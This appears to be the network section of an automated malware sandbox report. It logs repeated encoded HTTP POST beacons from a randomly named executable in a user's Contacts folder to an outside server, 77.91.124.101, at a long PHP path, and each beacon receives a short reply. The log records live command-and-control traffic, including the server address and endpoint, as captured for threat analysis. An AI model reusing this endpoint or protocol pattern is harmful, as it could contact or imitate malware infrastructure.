                                                            Data Ascii: R[XZ[__Z]WUWUYWPP_XHVRW_^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$*6=+T=(/$] 5(3>9$#.V:>_<7;&G''^)
                                                            Nov 21, 2023 04:47:35.080408096 CET196INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:34 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            130192.168.2.54984577.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:54.002024889 CET670OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:54.198462009 CET670INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:54.198731899 CET672OUTData Raw: 57 51 58 5a 5e 5e 5a 50 5d 57 55 57 55 58 57 53 50 58 58 47 56 53 57 5d 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: WQXZ^^ZP]WUWUXWSPXXGVSW]^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'\+8=+2R?#4/$-49+060=$ 9"^>,</&G''^)?
                                                            Nov 21, 2023 04:48:54.400331020 CET673INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:54 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            13077.91.124.10180192.168.2.549845C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:54.002024889 CET670OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:54.198462009 CET670INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:54.198731899 CET672OUTData Raw: 57 51 58 5a 5e 5e 5a 50 5d 57 55 57 55 58 57 53 50 58 58 47 56 53 57 5d 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: WQXZ^^ZP]WUWUXWSPXXGVSW]^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'\+8=+2R?#4/$-49+060=$ 9"^>,</&G''^)?
                                                            Nov 21, 2023 04:48:54.400331020 CET673INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:54 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            13177.91.124.10180192.168.2.549846C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:54.733474016 CET673OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:54.930938959 CET674INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:54.931238890 CET676OUTData Raw: 57 5e 58 5f 5e 5f 5a 50 5d 57 55 57 55 5f 57 53 50 5a 58 44 56 56 57 5b 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: W^X_^_ZP]WUWU_WSPZXDVVW[^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$=!?+* #,$)#1+3=13#=,8)??4->&G''^)#
                                                            Nov 21, 2023 04:48:55.134145021 CET676INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:54 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            131192.168.2.54984677.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:54.733474016 CET673OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:54.930938959 CET674INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:54.931238890 CET676OUTData Raw: 57 5e 58 5f 5e 5f 5a 50 5d 57 55 57 55 5f 57 53 50 5a 58 44 56 56 57 5b 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: W^X_^_ZP]WUWU_WSPZXDVVW[^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$=!?+* #,$)#1+3=13#=,8)??4->&G''^)#
                                                            Nov 21, 2023 04:48:55.134145021 CET676INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:54 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            132192.168.2.54984777.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:55.457685947 CET677OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:55.654196978 CET677INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:55.654433966 CET680OUTData Raw: 57 58 58 5a 5b 53 5a 5e 5d 57 55 57 55 59 57 57 50 5c 58 47 56 51 57 58 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: WXXZ[SZ^]WUWUYWWP\XGVQWX^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$=1?=;;$1 :5](#$->P$-,;:Y<(->&G''^)
                                                            Nov 21, 2023 04:48:55.856467009 CET680INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:55 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            13277.91.124.10180192.168.2.549847C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:55.457685947 CET677OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:55.654196978 CET677INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:55.654433966 CET680OUTData Raw: 57 58 58 5a 5b 53 5a 5e 5d 57 55 57 55 59 57 57 50 5c 58 47 56 51 57 58 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: WXXZ[SZ^]WUWUYWWP\XGVQWX^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$=1?=;;$1 :5](#$->P$-,;:Y<(->&G''^)
                                                            Nov 21, 2023 04:48:55.856467009 CET680INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:55 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            133192.168.2.54984877.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:56.192643881 CET681OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:56.390491009 CET681INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:57.889027119 CET684OUTData Raw: 57 5a 58 5c 5e 5d 5f 5e 5d 57 55 57 55 5e 57 51 50 53 58 49 56 56 57 53 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: WZX\^]_^]WUWU^WQPSXIVVWS^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'Y>+!_+>W=0 82[4*+&R$=>V0V>-;:<$8>&G''^)/
                                                            Nov 21, 2023 04:48:58.091731071 CET684INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:56 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            13377.91.124.10180192.168.2.549848C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:56.192643881 CET681OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:56.390491009 CET681INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:57.889027119 CET684OUTData Raw: 57 5a 58 5c 5e 5d 5f 5e 5d 57 55 57 55 5e 57 51 50 53 58 49 56 56 57 53 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: WZX\^]_^]WUWU^WQPSXIVVWS^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'Y>+!_+>W=0 82[4*+&R$=>V0V>-;:<$8>&G''^)/
                                                            Nov 21, 2023 04:48:58.091731071 CET684INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:56 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            14192.168.2.54972677.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:47:35.397778988 CET197OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:35.594356060 CET197INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:35.594820023 CET200OUTData Raw: 52 5d 58 5c 5e 5a 5a 5c 5d 57 55 57 55 58 57 52 50 5b 58 44 56 56 57 5d 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: R]X\^ZZ\]WUWUXWRP[XDVVW]^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$=^!_?(!)0;;7%7:1X< 5$=:& *,+&X+->&G''^)?
                                                            Nov 21, 2023 04:47:35.797945976 CET200INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:35 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            1477.91.124.10180192.168.2.549726C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:47:35.397778988 CET197OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:35.594356060 CET197INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:35.594820023 CET200OUTData Raw: 52 5d 58 5c 5e 5a 5a 5c 5d 57 55 57 55 58 57 52 50 5b 58 44 56 56 57 5d 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: R]X\^ZZ\]WUWUXWRP[XDVVW]^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$=^!_?(!)0;;7%7:1X< 5$=:& *,+&X+->&G''^)?
                                                            Nov 21, 2023 04:47:35.797945976 CET200INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:35 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            15192.168.2.54972777.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:47:36.113682032 CET201OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:36.311444998 CET201INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:36.311707973 CET204OUTData Raw: 57 50 5d 59 5b 5b 5a 5f 5d 57 55 57 55 5c 57 52 50 53 58 46 56 5f 57 53 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: WP]Y[[Z_]WUWU\WRPSXFV_WS^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$>+5<:)8/B6]#!Y< "R&.:Q'29+9?X/&G''^)/
                                                            Nov 21, 2023 04:47:36.515629053 CET204INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:36 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            1577.91.124.10180192.168.2.549727C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:47:36.113682032 CET201OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:36.311444998 CET201INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:36.311707973 CET204OUTData Raw: 57 50 5d 59 5b 5b 5a 5f 5d 57 55 57 55 5c 57 52 50 53 58 46 56 5f 57 53 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: WP]Y[[Z_]WUWU\WRPSXFV_WS^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$>+5<:)8/B6]#!Y< "R&.:Q'29+9?X/&G''^)/
                                                            Nov 21, 2023 04:47:36.515629053 CET204INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:36 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            16192.168.2.54972877.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:47:36.833880901 CET205OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:37.031764984 CET205INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:37.032001972 CET208OUTData Raw: 57 59 5d 5e 5e 58 5a 59 5d 57 55 57 55 5d 57 55 50 53 58 48 56 5e 57 5c 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: WY]^^XZY]WUWU]WUPSXHV^W\^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$)(Z(;=+_/76_#!^+>R$.>R002-8*\</.&G''^)+
                                                            Nov 21, 2023 04:47:37.236182928 CET208INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:36 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


